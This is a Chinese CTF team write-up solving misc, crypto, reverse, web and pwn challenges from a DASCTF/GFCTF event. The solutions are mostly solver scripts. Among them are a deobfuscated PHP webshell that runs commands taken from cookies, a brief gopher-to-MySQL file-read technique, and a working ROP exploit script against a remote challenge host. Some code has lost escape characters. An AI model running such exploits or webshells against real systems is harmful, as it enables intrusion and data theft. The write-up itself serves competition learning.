-联合战队|共同成长-
Misc-tele
Telegram使用了STUN协议流量。STUN(NAT会话遍历)是一种标准化协议,旨在帮助 NAT(网络地址转换)后面的设备确定其外部 IP 地址以及其网关上使用的 NAT 类型。该协议的本质是使设备能够了解其公共 IP 地址并确定哪些端口可用于传出连接。STUN消息中携带的关键属性之一是XOR-MAPPED-ADDRESS。该属性包含消息发送者的公共IP地址。数据包的方向准确地确定了此属性中包含谁的 IP 地址:如果该帧定向到我,XOR-MAPPED-ADDRESS将显示我的 IP,如果它是从我发送的,则显示我的对话者的 IP。
过滤规则:
stun or stun.att.username or stun.att.ipv4-xord or stun.att.ipv4
检查数据包并在属性部分中查找 XOR-MAPPED-ADDRESS
提取到如下地址
171.88.96.93
171.88.96.218
91.108.9.41
逐个IP尝试提交
最后确定171.88.96.93为目标IP
Misc-parser
将脚本提取出来,反混淆。
# original php 有许多十六进制的字节。
# python转换一下。 这里就不贴了。
p1_hex_bytes.py
with open('1.php', 'rb') as f:
con = f.read()
con = con.replace(b'xd8xaexefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxcdxb1xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd', b'v1')
con = con.replace(b'xcaxaaxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxd1x80xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd', b'v2')
con = con.replace(b'xefxbfxbdxefxbfxbdxc5xa8xdcxb9xefxbfxbdxc8x8fxefxbfxbdxefxbfxbdxc8xb5xefxbfxbd', b'v3')
con = con.replace(b'xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxe3xa1xb3', b'v4')
con = con.replace(b'xefxbfxbdxefxbfxbdxefxbfxbdxdcxa5xefxbfxbdxd2x93xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxc9x9dxefxbfxbd', b'v5')
con = con.replace(b'xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxd7xbbxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd', b'v6')
con = con.replace(b'xefxbfxbdxefxbfxbdxefxbfxbdxe5x84x8exefxbfxbdxd5xb8xefxbfxbdxd6xbfxefxbfxbdxefxbfxbd', b'v7')
con = con.replace(b'xefxbfxbdxefxbfxbdxe0xadx8fxefxbfxbdxefxbfxbdxefxbfxbdxd5xa5xc4x86xefxbfxbdxefxbfxbdxefxbfxbd', b'v8')
con = con.replace(b'xefxbfxbdxe5xb3xb6xefxbfxbdxefxbfxbdxcex92xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd', b'v9')
con = con.replace(b'xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxcfx8exdfxaexefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd', b'v10')
con = con.replace(b'xefxbfxbdxcex89xefxbfxbdxd6x8fxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxd3xb1xebxbbxb2xefxbfxbd', b'v11')
con = con.replace(b'xefxbfxbdxefxbfxbdxefxbfxbdxd1xadxefxbfxbdxccxb3xefxbfxbdxc3xa2xefxbfxbdxefxbfxbdxefxbfxbdxd9xbc', b'v12')
con = con.replace(b'xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxd0xb9xefxbfxbdxefxbfxbdxefxbfxbd', b'v13')
print(con)
得到 2.php:
<?php
str_rot13(substr('kofvamreebe_ercbegvat', 6, 15))(E_ALL ^ E_NOTICE);
$v1 = str_rot13(substr('etsjuonfr64_qrpbqr', 5, 13))(substr('vxMDgwNjdTZWM=', 2, 12));
function xorDecrypt($v2, $v3) { $v2 = str_rot13(substr('xothonfr64_qrpbqr', 4, 13))($v2);
$v4 = str_rot13(substr('jtonfr64_qrpbqr', 2, 13))('');
$v5 = str_rot13(substr('efgeyra', 1, 6))($v3);
for ($v6 = 0;
$v6 < str_rot13(substr('jtefgeyra', 3, 6))($v2);
$v6++) { $v7 = $v3[$v6 % $v5];
$v8 = str_rot13(substr('ybeq', 1, 3))($v2[$v6]) - $v6 % 3;
$v8 = ($v8 ^ str_rot13(substr('rgxamfbeq', 6, 3))($v7)) % 256;
$v4 .= str_rot13(substr('hlvqapue', 5, 3))($v8);
} return $v4;
}
class A {
public function __construct($v9, $v10) {
$v11 = str_rot13(substr('xjyvwrkbeQrpelcg', 6, 10))($v9, str_rot13(substr('ncchbaonfr64_qrpbqr', 6, 13))(substr('jhpmqR0ZDVEYyMDI0', 5, 12)));
$v12 = str_rot13(substr('gyfjiekbeQrpelcg', 6, 10))($v10, str_rot13(substr('ascbqonfr64_qrpbqr', 5, 13))(substr('sgxsemREFTQ1RG', 6, 8)));
str_rot13(substr('hgwqkmcevag_e', 6, 7))(str_rot13(substr('kiokxonfr64_rapbqr', 5, 13))
(str_rot13(substr('cfdnkbeQrpelcg', 4, 10))(str_rot13(substr('jmonfr64_rapbqr', 2, 13))(str_rot13(substr('yndhsupnyy_hfre_shap', 6, 14))($v11, $v12)), str_rot13(substr('ukifonfr64_qrpbqr', 4, 13))(substr('hrwcuhR0VUTVlGTEFH', 6, 12)))));
}
}
if ($_POST[str_rot13(substr('vqewegonfr64_qrpbqr', 6, 13))(substr('gucGFzcw==', 2, 8))] === str_rot13(substr('fffun1', 2, 4))($v1)) {
$v13 = new A($_COOKIE[str_rot13(substr('wonfr64_qrpbqr', 1, 13))(substr('mugeXM=', 3, 4))], $_COOKIE[str_rot13(substr('lreuonfr64_qrpbqr', 4, 13))(substr('xfkkcWQ=', 4, 4))]);
}
echo str_rot13(substr('bxgonfr64_qrpbqr', 3, 13))(substr('hjnc3VjY2Vzc18x', 3, 12));
将substr执行一下:
import codecs
import re
with open('2.php', 'r') as f:
con = f.read()
fall = re.findall(r'substr('[^']+', [d]+, [d]+)', con)
for s1 in fall:
strt, startt, stopt = re.findall(r'substr('([^']+)', ([d]+), ([d]+))', s1)[0]
res = strt[int(startt): int(startt)+int(stopt)]
con = con.replace(s1, '''+res+''')
print(con)
得到3.php
<?php
str_rot13('reebe_ercbegvat')(E_ALL ^ E_NOTICE);
$v1 = str_rot13('onfr64_qrpbqr')('MDgwNjdTZWM=');
function xorDecrypt($v2, $v3) { $v2 = str_rot13('onfr64_qrpbqr')($v2);
$v4 = str_rot13('onfr64_qrpbqr')('');
$v5 = str_rot13('fgeyra')($v3);
for ($v6 = 0;
$v6 < str_rot13('fgeyra')($v2);
$v6++) { $v7 = $v3[$v6 % $v5];
$v8 = str_rot13('beq')($v2[$v6]) - $v6 % 3;
$v8 = ($v8 ^ str_rot13('beq')($v7)) % 256;
$v4 .= str_rot13('pue')($v8);
} return $v4;
}
class A {
public function __construct($v9, $v10) {
$v11 = str_rot13('kbeQrpelcg')($v9, str_rot13('onfr64_qrpbqr')('R0ZDVEYyMDI0'));
$v12 = str_rot13('kbeQrpelcg')($v10, str_rot13('onfr64_qrpbqr')('REFTQ1RG'));
str_rot13('cevag_e')(str_rot13('onfr64_rapbqr')
(str_rot13('kbeQrpelcg')(str_rot13('onfr64_rapbqr')(str_rot13('pnyy_hfre_shap')($v11, $v12)), str_rot13('onfr64_qrpbqr')('R0VUTVlGTEFH'))));
}
}
if ($_POST[str_rot13('onfr64_qrpbqr')('cGFzcw==')] === str_rot13('fun1')($v1)) {
$v13 = new A($_COOKIE[str_rot13('onfr64_qrpbqr')('eXM=')], $_COOKIE[str_rot13('onfr64_qrpbqr')('cWQ=')]);
}
echo str_rot13('onfr64_qrpbqr')('c3VjY2Vzc18x');
再将str_rot13执行一下:
import codecs
import re
with open('3.php', 'r') as f:
con = f.read()
fall = re.findall(r'str_rot13('[^']+')', con)
for s1 in fall:
strt = re.findall(r'str_rot13('([^']+)')', s1)[0]
res = codecs.encode(strt, 'rot_13')
con = con.replace(s1, res)
print(con)
得到4.php:
<?php
error_reporting(E_ALL ^ E_NOTICE);
$v1 = base64_decode('MDgwNjdTZWM=');
function xorDecrypt($v2, $v3) { $v2 = base64_decode($v2);
$v4 = base64_decode('');
$v5 = strlen($v3);
for ($v6 = 0;
$v6 < strlen($v2);
$v6++) { $v7 = $v3[$v6 % $v5];
$v8 = ord($v2[$v6]) - $v6 % 3;
$v8 = ($v8 ^ ord($v7)) % 256;
$v4 .= chr($v8);
} return $v4;
}
class A {
public function __construct($v9, $v10) {
$v11 = xorDecrypt($v9, base64_decode('R0ZDVEYyMDI0'));
$v12 = xorDecrypt($v10, base64_decode('REFTQ1RG'));
print_r(base64_encode
(xorDecrypt(base64_encode(call_user_func($v11, $v12)), base64_decode('R0VUTVlGTEFH'))));
}
}
if ($_POST[base64_decode('cGFzcw==')] === sha1($v1)) {
$v13 = new A($_COOKIE[base64_decode('eXM=')], $_COOKIE[base64_decode('cWQ=')]);
}
echo base64_decode('c3VjY2Vzc18x');
再将base64-decode执行一下,得到5.php
<?php
error_reporting(E_ALL ^ E_NOTICE);
$v1 = '08067Sec';
function xorDecrypt($v2, $v3) {
$v2 = base64_decode($v2);
$v4 = base64_decode('');
$v5 = strlen($v3);
for ($v6 = 0;$v6 < strlen($v2); $v6++) {
$v7 = $v3[$v6 % $v5];
$v8 = ord($v2[$v6]) - $v6 % 3;
$v8 = ($v8 ^ ord($v7)) % 256;
$v4 .= chr($v8);
}
return $v4;
}
class A {
public function __construct($v9, $v10) {
$v11 = xorDecrypt($v9, 'GFCTF2024');
$v12 = xorDecrypt($v10, 'DASCTF');
print_r(base64_encode(xorDecrypt(base64_encode(call_user_func($v11, $v12)), 'GETMYFLAG')));
}
}
if ($_POST['pass'] === sha1($v1)) { # 08067Sec --> c0ba7f1fcaeb228316d7bd4c89f37b12baf7cbe8
$v13 = new A($_COOKIE['ys'], $_COOKIE['qd']);
}
echo 'success_1';
发现最后一个HTTP流执行的命令就是cat /flag:
所以,对其返回的结果进行解密:
import base64
from Crypto.Util.number import *
c1 = "AwUFDgoCNzlpMhtmPz0bPCYpF3YkPms2Ey11NDZlPyVO"
key = 'GETMYFLAG'
c2 = base64.b64decode(c1)
# xorDecrypt
for i,b in enumerate(c2):
v7 = key[ i%len(key) ]
b1 = ((b)^ord(v7)) % 256
b2 = b1 + i%3
print(chr(b2), end='')
得到flag:
DASCTF{y0u_4re_phpP4rs3r_m4st3r}
Misc-Badmes
# -*- coding: utf-8 -*-
from pwn import *
import subprocess
sh = remote("4.216.46.225", 2333)
context.log_level = 'debug'
data = sh.recv()
data = data.decode()
print(data)
with open("input.txt", "w", encoding="utf-8") as file:
file.write(data)
command = ["python", "judgeSpamMessage.py ","-c", "svm","-i", "input.txt","-o", "result.txt"]
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
sleep(1)
if process.returncode == 0:
with open("result.txt", "r") as file:
result = file.read()
sh.send(result)
for i in range(240):
point = sh.recvline()
point = point.decode()
print(point)
data = sh.recv()
data = data.decode()
print(data)
with open("input.txt", "w", encoding="utf-8") as file:
file.write(data)
command = ["python", "judgeSpamMessage.py ","-c", "svm","-i", "input.txt","-o", "result.txt"]
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
sleep(1)
if process.returncode == 0:
with open("result.txt", "r") as file:
result = file.read()
sh.send(result)
sh.interactive()
数据集可能给错了,没有label无法训练,找了个开源训练好的向量机一做
需要确保sklearn的版本低于0.21
Crypto-The Mystery of Math
from Crypto.Util.number import *
from sympy import nextprime
from pwn import *
#context.log_level = 'debug'
t = 1
a = 2
for i in range(20):
t *= a**150
a = nextprime(a)
while(1):
sh = remote("node5.buuoj.cn",28758)
sh.sendline("p".encode('utf-8'))
sh.recvuntil(b"random_pro: ")
random_pro = sh.recvline().decode('utf-8')
sh.recvuntil(b"c: ")
c = int(sh.recvline().strip().decode())
sh.recvuntil(b"n: ")
n = int(sh.recvline().strip().decode())
sh.recvuntil(b"tip: ")
tip = int(sh.recvline().strip().decode())
if(GCD(pow(2,t,n)-1,n) != 1 and GCD(pow(2,t,n)-1,n) != n):
p = GCD(pow(2,t,n)-1,n)
q = n // p
phi = (p-1)*(q-1)
d = inverse(65537,phi)
print(long_to_bytes(pow(c,d,n)))
exit()
sh.close()
Re-ezVM
arr = "2x*{*{|}qdz,{}d(}q,dxx}zd(z}px7f(z+~}yy4"
for i in arr:
print(chr(ord(i) ^ 0x49),end="")
加个flag头
Re-unwind
main函数里面有一次XXtea
另外一个函数调用了两次xtea函数
所以是一次xxtea两次xtea,直接套用解密函数
from ctypes import *
a=[0x87AAA7C1, 0x857321B6, 0x0E71D28C, 0xCADF39F2, 0x58EFCA14, 0xD7E7D9D8, 0xF29F5C5D, 0x5F5ED45E]
k= [0x00000044, 0x00000041, 0x00000053, 0x00000021]
a1 = a
a2 = k
decode = {}
v5 = c_uint32(0)
times = 36
delta = 1640531527
for j in range(0, len(a1), 2):
v5 = c_uint32(-delta * 36)
v1 = c_uint32(a1[j])
v2 = c_uint32(a1[j + 1])
for i in range(times):
v2.value -= (a2[(v5.value >> 11) & 3] + v5.value) ^ (v1.value + ((v1.value >> 5) ^ (16 * v1.value)))
v5.value += delta
v1.value -= (a2[(v5.value) & 3] + v5.value) ^ (v2.value + ((v2.value >> 5) ^ (16 * v2.value)))
decode[j] = v1
decode[j + 1] = v2
for i in decode:
a[i]=decode[i].value
a1 = a
a2 = k
decode = {}
v5 = c_uint32(0)
times = 36
delta = 1640531527
for j in range(0, len(a1), 2):
v5 = c_uint32(-delta * 36)
v1 = c_uint32(a1[j])
v2 = c_uint32(a1[j + 1])
for i in range(times):
v2.value -= (a2[(v5.value >> 11) & 3] + v5.value) ^ (v1.value + ((v1.value >> 5) ^ (16 * v1.value)))
v5.value += delta
v1.value -= (a2[(v5.value) & 3] + v5.value) ^ (v2.value + ((v2.value >> 5) ^ (16 * v2.value)))
decode[j] = v1
decode[j + 1] = v2
for i in decode:
a[i]=decode[i].value
from ctypes import *
def MX(z, y, sum1, k, p, e):
return c_uint32(((z.value>>5^y.value<<2)+(y.value>>3^z.value<<4))^((sum1.value^y.value)+(k[(p&3)^e.value]^z.value)))
def btea(v,k,n,delta):
if n>1:
sum1=c_uint32(0)
z=c_uint32(v[n-1])
rounds=6+52//n
e=c_uint32(0)
while rounds>0:
sum1.value+=delta
e.value=((sum1.value>>2)&3)
for p in range(n-1):
y=c_uint32(v)
v
= c_uint32(v
+ MX(z,y,sum1,k,p,e).value).value
z.value=v
y=c_uint32(v[0])
v[n-1] = c_uint32(v[n-1] + MX(z,y,sum1,k,n-1,e).value).value
z.value=v[n-1]
rounds-=1
else:
sum1=c_uint32(0)
n=-n
rounds=6+52//n
sum1.value=rounds*delta
y=c_uint32(v[0])
e=c_uint32(0)
while rounds>0:
e.value=((sum1.value>>2)&3)
for p in range(n-1, 0, -1):
z=c_uint32(v[p-1])
v
= c_uint32(v
- MX(z,y,sum1,k,p,e).value).value
y.value=v
z=c_uint32(v[n-1])
v[0] = c_uint32(v[0] - MX(z,y,sum1,k,0,e).value).value
y.value=v[0]
sum1.value-=delta
rounds-=1
return v
if __name__=='__main__':
k= [0x00000044, 0x00000041, 0x00000053, 0x00000021]
delta=0x9e3779b9
n=len(a)
res=btea(a,k,-n,delta)
print("解密后数据:",res)
flag=''
import libnum
for i in res:
flag+=(libnum.n2s(i)[::-1].decode())
print(flag)
flag:DASCTF{Gr3@t!Y0u_have_50lv3d_1T}
Re-prese
把temp加密表调出来之后直接用密文做下标,得到的结果需要大小写转换
arr = [0xE2, 0xE3, 0xE0, 0xE1, 0xE6, 0xE7, 0xE4, 0xE5, 0xEA, 0xEB, 0xE8, 0xE9, 0xEE, 0xEF, 0xEC, 0xED, 0xF2, 0xF3, 0xF0, 0xF1, 0xF6, 0xF7, 0xF4, 0xF5, 0xFA, 0xFB, 0xF8, 0xF9, 0xFE, 0xFF, 0xFC, 0xFD, 0xC2, 0xC3, 0xC0, 0xC1, 0xC6, 0xC7, 0xC4, 0xC5, 0xCA, 0xCB, 0xC8, 0xC9, 0xCE, 0xCF, 0xCC, 0xCD, 0xD2, 0xD3, 0xD0, 0xD1, 0xD6, 0xD7, 0xD4, 0xD5, 0xDA, 0xDB, 0xD8, 0xD9, 0xDE, 0xDF, 0xDC, 0xDD, 0xA2, 0xA3, 0xA0, 0xA1, 0xA6, 0xA7, 0xA4, 0xA5, 0xAA, 0xAB, 0xA8, 0xA9, 0xAE, 0xAF, 0xAC, 0xAD, 0xB2, 0xB3, 0xB0, 0xB1, 0xB6, 0xB7, 0xB4, 0xB5, 0xBA, 0xBB, 0xB8, 0xB9, 0xBE, 0xBF, 0xBC, 0xBD, 0x82, 0x83, 0x80, 0x81, 0x86, 0x87, 0x84, 0x85, 0x8A, 0x8B, 0x88, 0x89, 0x8E, 0x8F, 0x8C, 0x8D, 0x92, 0x93, 0x90, 0x91, 0x96, 0x97, 0x94, 0x95, 0x9A, 0x9B, 0x98, 0x99, 0x9E, 0x9F, 0x9C, 0x9D, 0x62, 0x63, 0x60, 0x61, 0x66, 0x67, 0x64, 0x65, 0x6A, 0x6B, 0x68, 0x69, 0x6E, 0x6F, 0x6C, 0x6D, 0x72, 0x73, 0x70, 0x71, 0x76, 0x77, 0x74, 0x75, 0x7A, 0x7B, 0x78, 0x79, 0x7E, 0x7F, 0x7C, 0x7D, 0x42, 0x43, 0x40, 0x41, 0x46, 0x47, 0x44, 0x45, 0x4A, 0x4B, 0x48, 0x49, 0x4E, 0x4F, 0x4C, 0x4D, 0x52, 0x53, 0x50, 0x51, 0x56, 0x57, 0x54, 0x55, 0x5A, 0x5B, 0x58, 0x59, 0x5E, 0x5F, 0x5C, 0x5D, 0x22, 0x23, 0x20, 0x21, 0x26, 0x27, 0x24, 0x25, 0x2A, 0x2B, 0x28, 0x29, 0x2E, 0x2F, 0x2C, 0x2D, 0x32, 0x33, 0x30, 0x31, 0x36, 0x37, 0x34, 0x35, 0x3A, 0x3B, 0x38, 0x39, 0x3E, 0x3F, 0x3C, 0x3D, 0x02, 0x03, 0x00, 0x01, 0x06, 0x07, 0x04, 0x05, 0x0A, 0x0B, 0x08, 0x09, 0x0E, 0x0F, 0x0C, 0x0D, 0x12, 0x13, 0x10, 0x11, 0x16, 0x17, 0x14, 0x15, 0x1A, 0x1B, 0x18, 0x19, 0x1E, 0x1F, 0x1C, 0x1D]
crypto = [0x86, 0x83, 0x91, 0x81, 0x96, 0x84, 0xB9, 0xA5, 0xAD, 0xAD,
0xA6, 0x9D, 0xB6, 0xAA, 0xA7, 0x9D, 0xB0, 0xA7, 0x9D, 0xAB,
0xB1, 0x9D, 0xA7, 0xA3, 0xB1, 0xBB, 0xAA, 0xAA, 0xAA, 0xAA,
0xBF]
for i in crypto:
print(chr(arr[i]),end="")
flag:DASCTF{good_the_re_is_easyhhhh}
Web-cool_index
Web-EasySignin
update.php 任意修改密码,修改admin
然后gopher打mysql,直接select load_file('/flag')即可
Pwn-dynamic_but_static
from pwn import *
import sys
remote_addr = ["node5.buuoj.cn",25763]
libc = ELF('./libc.so.6')
elf = ELF('./pwn')
if len(sys.argv) == 1:
context.log_level="debug"
#p = process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu/", "-g","1234","./stack"])
#p = process(["qemu-aarch64", "-L", ".", "./stack"])
p = process("./pwn_patched")
context(arch='amd64', os='linux')
context.terminal = ['tmux', 'splitw', '-h']
if len(sys.argv) == 2 :
if 'r' in sys.argv[1]:
p = remote(remote_addr[0],remote_addr[1])
if 'n' not in sys.argv[1]:
context.log_level="debug"
context(arch = 'amd64', os = 'linux')
r = lambda : p.recv()
rl = lambda : p.recvline()
rc = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
shell = lambda : p.interactive()
pr = lambda name,x : log.info(name+':'+hex(x))
DEBUG = 1
def debug(bp = None):
if DEBUG == 1:
if bp != None:
gdb.attach(p, bp)
else:
gdb.attach(p)
#debug('''
#3 b *0x40143d
#''')
pop_rdi = 0x401381
main = 0x401386
bss_addr = 0x404800
leave_ret = 0x401349
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
payload = b'a' * (0x20) + p64(0) + b'a' * (0x10) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
s(payload)
libc.address = u64(ru(b'x7f')[-6:].ljust(8, b'x00')) - libc.sym['puts']
pr('libc.address', libc.address)
pop_rsi = libc.address + 0x2be51
pop_rdx = libc.address + 0x796a2
pop_rax = libc.address + 0x45eb0
xor_rax = libc.address + 0xbaaf9
syscall_ret = libc.address + 0x91316
o = libc.sym['open']
r = libc.sym['read'] + 4
w = libc.sym['write']
payload = b'a' * (0x20) + p64(0) + p64(bss_addr) * 2 + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss_addr) + p64(pop_rdx) + p64(0x200) + p64(xor_rax) + p64(syscall_ret) + p64(leave_ret) + p64(0)
pause()
s(payload)
payload = b'/flagx00x00x00' + flat(pop_rdi, bss_addr, pop_rsi, 0, pop_rax, 2, syscall_ret, pop_rdi, 3, pop_rsi, bss_addr + 0x120, pop_rdx, 0x100, pop_rax, 0, syscall_ret, pop_rdi, 1, pop_rsi, bss_addr + 0x120, pop_rdx, 0x100, pop_rax, 1, syscall_ret)
pause()
s(payload)
shell()
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论